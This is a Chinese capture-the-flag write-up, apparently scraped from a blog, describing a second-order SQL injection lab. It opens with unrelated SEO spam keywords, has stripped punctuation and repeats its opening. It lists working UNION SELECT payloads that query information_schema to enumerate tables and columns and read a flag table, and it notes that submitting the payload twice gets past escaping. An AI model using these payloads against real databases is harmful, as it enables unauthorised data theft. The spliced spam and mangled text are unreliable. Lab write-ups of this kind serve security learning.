精彩 网站,昆山网站建设网站建设,提供户型图免费设计,万能浏览器手机版下载安装2022题目得到信息#xff0c;2次注入#xff0c;进入靶场 登录页面#xff0c;很自然想到SQL 第一次注入应该是这个可以登录#xff0c;注册#xff0c;提交简介的页面
第二次注入应该是在info处注入#xff0c;信息显示在简介处 我真的纯脑子有病#xff0c;人家二次注入不…
题目得到信息2次注入进入靶场 登录页面很自然想到SQL 第一次注入应该是这个可以登录注册提交简介的页面
第二次注入应该是在info处注入信息显示在简介处 我真的纯脑子有病人家二次注入不是注入两次是一次注入通过两次操作实现如下所示 被转义了
不过恶意语句输两次就可以了 database()库名ctftraining 1 union select group_concat(table_name) from information_schema.tables where table_schemactftraining#
表名flag,news,users 1 union select group_concat(column_name) from information_schema.columns where table_nameflag#
字段名flag
1 union select group_concat(flag) from ctftraining.flag# 注册失败
修改修改
1 union select flag from ctftraining.flag# 最后一步不显示flag
再修改修改
1 union select flag from flag# 这句就对了
得到flag 笔记
1SQL注入还有2次注入的类型
2爆出信息的语句需要多次修改
3看到陌生词语先搜搜不能想当然